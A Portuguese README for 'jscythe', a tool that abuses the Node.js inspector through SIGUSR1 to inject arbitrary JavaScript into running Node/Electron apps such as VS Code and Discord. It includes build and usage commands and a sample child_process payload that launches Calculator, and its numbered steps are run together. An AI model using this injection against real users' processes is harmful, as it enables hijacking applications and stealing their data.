
Abuse o mecanismo de inspeção do node.js para forçar qualquer processo baseado em node.js/electron/v8 a executar código javascript arbitrário.
jscythe abusa do mecanismo de inspetor do node.js para forçar qualquer processo baseado em node.js/electron/v8 a executar código javascript arbitrário, mesmo que suas capacidades de depuração estejam desativadas.

Testado e funcionando contra Visual Studio Code, Discord, qualquer aplicação Node.js e mais!
SIGUSR1 para o processo, isso habilitará o depurador em uma porta (dependendo do software, às vezes é aleatório, às vezes não).SIGUSR1.http://localhost:<port>/json.Runtime.evaluate com o código fornecido.cargo build --release
Alvo um processo específico e execute uma expressão básica:
./target/release/jscythe --pid 666 --code "5 - 3 + 2"
Execute código de um arquivo:
./target/release/jscythe --pid 666 --script example_script.js
O example_script.js pode exigir qualquer módulo node e executar qualquer código, como:
require('child_process').spawnSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator', { encoding : 'utf8' }).stdout
Pesquise processo por expressão:
./target/release/jscythe --search extensionHost --script example_script.js
Execute jscythe --help para a lista completa de opções.
Este projeto é feito com ♥ por @evilsocket e é lançado sob a licença GPL3.